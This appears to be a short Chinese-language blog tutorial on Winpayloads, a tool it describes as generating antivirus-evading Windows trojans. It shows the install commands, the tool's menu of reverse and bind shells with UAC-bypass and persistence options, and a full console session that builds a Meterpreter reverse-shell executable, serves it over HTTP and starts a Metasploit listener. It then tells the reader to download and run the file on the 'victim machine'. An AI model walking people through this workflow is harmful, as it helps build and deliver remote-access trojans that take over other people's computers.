工具链接 https://github.com/nccgroup/Winpayloads
简介 Winpayloads 是一款制作免杀windows木马的工具
安装 下载git clone https://github.com/nccgroup/Winpayloads.gitcd Winpayloadschmod +x setup.sh ./setup.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 _ ___ ____ __ __ | | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____ | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/ | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ ) |__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/ /____/NCCGroup - CharlieDean ===================================================================================================================================Main Menu================================================================================================================================== 1: Windows Reverse Shell 2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks] 3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks] 4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks] 5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks] ps: PowerShell Menu stager: Powershell Interpreter Stager clients: Connected Interpreter Clients ?: Print Detailed Help back: Main Menu exit : Exit ============================================================================================================================================================================================================================================================================== Main Menu >
使用 比如你要生成一个Windows Meterpreter Reverse Shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 Main Menu > 2 [*] Press Enter For Default Port(4444) [*] Port> 4444 [*] Press Enter To Get Local Ip Automatically(1.1.1.16) [*] IP> [*] IP SET AS 1.1.1.16 [*] PORT SET AS 4444 [*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y [*] Creating Payload using Pyinstaller... - Genera [*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe [*] Upload To Local Websever or (p)sexec? [y]/p/n: y [*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v4.14.27-dev ] + -- --=[ 1659 exploits - 951 auxiliary - 293 post ] + -- --=[ 486 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] payload => windows/meterpreter/reverse_tcp LPORT => 4444 LHOST => 0.0.0.0 autorunscript => multi_console_command -rc uacbypass.rc ExitOnSession => false [*] Exploit running as background job. [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Starting the payload handler... msf exploit(handler) >
在受害者机器上打开 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe,之后运行就可以了
评价 其实不能做到完全免杀,可能是因为工具出来太久的缘故,但是生成木马的方式还是挺简单的值得一试